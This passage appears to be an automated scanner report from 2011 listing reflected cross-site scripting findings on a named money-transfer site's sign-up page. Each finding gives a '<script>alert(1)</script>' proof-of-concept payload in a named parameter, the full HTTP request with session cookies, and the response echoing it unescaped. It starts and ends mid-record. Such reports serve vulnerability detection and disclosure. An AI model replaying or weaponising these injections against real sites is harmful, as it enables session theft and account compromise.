GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=f1938"><script>alert(1)</script>59ac63e2d322439b2 &phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=25E286B67B8ACCEC8365CD16BB666883; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:33 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:33 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "07286154335fcd2699d808910ce8792c2" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:26 GMT Content-Length: 29990 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... p;countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&name=&contactInformation.firstName.value=&contactInformation.phone1.value=f1938"><script>alert(1)</script>59ac63e2d322439b2 &signInTs=1320876654393&contactInformation.lastName.value=&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.8. https://www.xoom.com/sendmoneynow/signUp [emailVerification parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the emailVerification request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b37a2"><script>alert(1)</script>ce7f0b7a9e13fac6e was submitted in the emailVerification parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=b37a2"><script>alert(1)</script>ce7f0b7a9e13fac6e &newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=CD4A89E99138E31EC39D4547366FCA14; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:32 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:32 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "04b981a771d59cfa381032d953b7872f7" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:25 GMT Content-Length: 29972 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... <a href="?lastName=&_action=signUp&phone1Included=true&newPassword=&passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=b37a2"><script>alert(1)</script>ce7f0b7a9e13fac6e &token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&contactInformation.firstName.value=&name=&contactInformation.phone1.value=&contactInformation.lastName.value=&signInTs=13...[SNIP]...
1.9. https://www.xoom.com/sendmoneynow/signUp [first_name parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the first_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79da"><script>alert(1)</script>fdaeda6b843a9ee82 was submitted in the first_name parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=c79da"><script>alert(1)</script>fdaeda6b843a9ee82 &countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=56A7190A10EE797DDCC9994AE1D9855C; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:18 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:18 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "007b56b407971042c35e3f784ef9571ec" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:10 GMT Content-Length: 29892 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... <a href="?phone1Included=true&lastName=&_action=signUp&newPassword=&passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=c79da"><script>alert(1)</script>fdaeda6b843a9ee82 &emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&name=&contactInformation.firstName.value=&contactInformation.phone1.value=&signInTs=1320876654393&...[SNIP]...
1.10. https://www.xoom.com/sendmoneynow/signUp [intcid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the intcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60796"><script>alert(1)</script>e74b605c7d1 was submitted in the intcid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sendmoneynow/signUp?intcid=home2_____signup60796"><script>alert(1)</script>e74b605c7d1 HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:05 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:05 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0300b0b93df5accf69c0deee78ba43e82" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:10:58 GMT Content-Length: 27688 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... <a href="?intcid=home2_____signup60796"><script>alert(1)</script>e74b605c7d1 &languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.11. https://www.xoom.com/sendmoneynow/signUp [lastName parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the lastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 435f9"><script>alert(1)</script>e78f8fffe8ec9c07a was submitted in the lastName parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=435f9"><script>alert(1)</script>e78f8fffe8ec9c07a &contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=DDDFEF28DDCF7D5E325B59656B39EE7C; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:28 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:28 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "097ec9c3896704a473bbf5ef87b5569bb" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:21 GMT Content-Length: 29874 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... <a href="?phone1Included=true&lastName=435f9"><script>alert(1)</script>e78f8fffe8ec9c07a &_action=signUp&newPassword=&passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf2337...[SNIP]...
1.12. https://www.xoom.com/sendmoneynow/signUp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aed6"><script>alert(1)</script>6def3fd099f999a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp&3aed6"><script>alert(1)</script>6def3fd099f999a1 =1 HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=438BBC78D264E3F8BB60C8A0178EB87E; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:37 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:37 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "029e783338c3235ef1dbdc00766536ab9" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:29 GMT Content-Length: 30004 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... ntactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&name=&contactInformation.firstName.value=&3aed6"><script>alert(1)</script>6def3fd099f999a1 =1&contactInformation.phone1.value=&signInTs=1320876654393&contactInformation.lastName.value=&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.13. https://www.xoom.com/sendmoneynow/signUp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e87"><script>alert(1)</script>e88ad41e56d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sendmoneynow/signUp?intcid=home2_____signup&d5e87"><script>alert(1)</script>e88ad41e56d =1 HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=CC4575174A7941997542C9F8D3CBD194; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:19 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; 